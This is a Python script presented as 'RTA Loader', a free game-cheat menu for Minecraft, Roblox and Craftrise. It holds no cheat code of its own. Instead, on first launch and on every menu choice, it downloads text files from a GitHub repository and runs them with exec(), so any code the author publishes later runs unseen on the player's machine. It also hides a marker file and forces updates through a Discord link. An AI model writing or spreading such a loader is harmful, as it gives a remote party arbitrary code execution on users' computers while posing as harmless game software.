import sys
import time
from time import sleep, strftime
from datetime import datetime
import threading
import webbrowser, os, re, json, random
import msvcrt
import subprocess
import ctypes
try:
    from faker import Faker
    from requests import session
    from colorama import Fore, Style
    import requests, random, re
    from random import choice, randint, shuffle
    import requests, pystyle
    from pystyle import Write, Colors
    import subprocess
    import ctypes
except:
    os.system("pip install faker && pip install ctypes")
    os.system("pip install requests")
    os.system("pip install colorama && pip install subprocess")
    os.system('pip install requests && pip install bs4 && pip install pystyle && pip install pycryptodome')
from pystyle import Add, Center, Anime, Colors, Colorate, Write, System

# Sürüm kontrol eklemeleri
CURRENT_VERSION = "1.0.1"  # Programın mevcut sürümü
VERSION_URL = "https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/version.txt"  # Versiyon dosyasının URL'si
UPDATE_URL = "https://discord.gg/VAdTMzQNsc"  # Güncelleme için yönlendirme URL'si

def fetch_version_from_url(url):
    """URL'den en son sürüm bilgisini alır."""
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            return response.text.strip()
        else:
            print(f"[!] Sürüm kontrolünde hata: {response.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[!] Sürüm kontrolü sırasında hata: {e}")
        return None

def check_version(current_version, version_url, update_url):
    """Mevcut sürümü kontrol eder ve gerekirse güncelleme önerir."""
    latest_version = fetch_version_from_url(version_url)
    if latest_version and current_version != latest_version:
        print(f"\n[!] Yeni sürüm mevcut! Güncellemeyi indirmeniz gerekiyor.")
        print(f"[!] Discord linki açılıyor: {update_url}")
        os.system(f"start {update_url}")
        print("[!] Program kapatılıyor...")
        sleep(3)
        sys.exit()
    elif latest_version:
        print(f"[✓] Sürüm güncel!")
    else:
        print("[!] Sürüm kontrolü başarısız. Program kapatılıyor.")
        sys.exit()

# Sürüm kontrolü
check_version(CURRENT_VERSION, VERSION_URL, UPDATE_URL)

# Orijinal kod devamı
def windowtitle(a):
    os.system(f"title {a}")
windowtitle("RTA LOADER 1.0.8 - Rafail7410")
try:
    f = open('TOSVDOIAHWOIHSAKLFHWA.txt')
except FileNotFoundError:
    exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Term%20of%20Services.txt').text)
else:
    f.close
    subprocess.check_call(["attrib", "+H", "TOSVDOIAHWOIHSAKLFHWA.txt"])
banner = f"""                            							    You have accepted RTA Loader's terms of service.

                 
                                                ██████╗ ████████╗ █████╗ 
                                                ██╔══██╗╚══██╔══╝██╔══██╗
                                                ██████╔╝   ██║   ███████║
                                                ██╔══██╗   ██║   ██╔══██║
                                                ██║  ██║   ██║   ██║  ██║
                                                ╚═╝  ╚═╝   ╚═╝   ╚═╝  ╚═╝

                                                Press ENTER to continue.                                                                     
"""[1:]
Anime.Fade(Center.Center(banner), Colors.black_to_white, Colorate.Vertical, enter=True)
# MÀU
xnhac = "\033[1;36m"
do = "\033[1;31m"
luc = "\033[1;32m"
vang = "\033[1;33m"
xduong = "\033[1;34m"
hong = "\033[1;35m"
trang = "\033[1;39m"
whiteb = "\033[1;39m"
red = "\033[0;31m"
redb = "\033[1;31m"
end = '\033[0m'
# BY THAT VAPE USER
dev = "\033[1;39m[\033[1;31m×\033[1;39m]\033[1;39m"
nig = """
                                                 \033[1;39mRTA Loader is FREE.

            \033[1;32m\033[1;39mWhat's new in RTA Loader 1.0.8 ? Checkout new feature & cheats here : https://discord.com/invite/n24UMEyWgJ



                                             \033[1;36m _______ _________ _______ 
                                             \033[1;36m (  ____ )\__   __/(  ___  )
                                             \033[1;36m | (    )|   ) (   | (   ) |
                                             \033[1;36m | (____)|   | |   | (___) |
                                             \033[1;36m |     __)   | |   |  ___  |
                                             \033[1;36m | (\ (      | |   | (   ) |
                                             \033[1;36m | ) \ \__   | |   | )   ( |
                                             \033[1;36m |/   \__/   )_(   |/     \|
             
                                                         \033[1;31m[\033[1;39mC\033[1;31m]
\033[1;39m                                                    \033[1;35m For credits.
   \033[0;31m                                            Choose your favourite game.


                                                   \033[1;31m[\033[1;39m1\033[1;31m] \033[1;32mMinecraft
					           \033[1;31m[\033[1;39m2\033[1;31m] \033[1;32mRoblox(Soon)
						   \033[1;31m[\033[1;39m3\033[1;31m] \033[1;32mCraftrise(New)
					           \033[1;31m[\033[1;39m4\033[1;31m] \033[1;32mOther(New)




"""
print(nig)
while True:
    os.system('cls')
    print(nig)
    chon = Write.Input("           [×] >>  ", Colors.red_to_purple, interval=0.0025)
    if chon == '1':
        os.system('cls')
        print("                                              \033[1;39mLoading Minecraft Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Minecraft.txt').text)
    if chon == '--':
        os.system('cls')
        print("                                              \033[1;39mLoading Roblox Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Roblox.txt').text)
    if chon == '3':
        os.system('cls')
        print("                                              \033[1;39mLoading Craftrise Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/craftrise.txt').text)
    if chon == '4':
        os.system('cls')
        print("                                              \033[1;39mLoading Minecraft Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Other.txt').text)
    if chon == 'c':
        os.system('cls')
        print("                                                  \033[1;39mRendering Credits..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Credits.txt').text)
    if chon == 'C':
        os.system('cls')
        print("                                                  \033[1;39mRendering Credits..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Credits.txt').text)
    else:
        continue
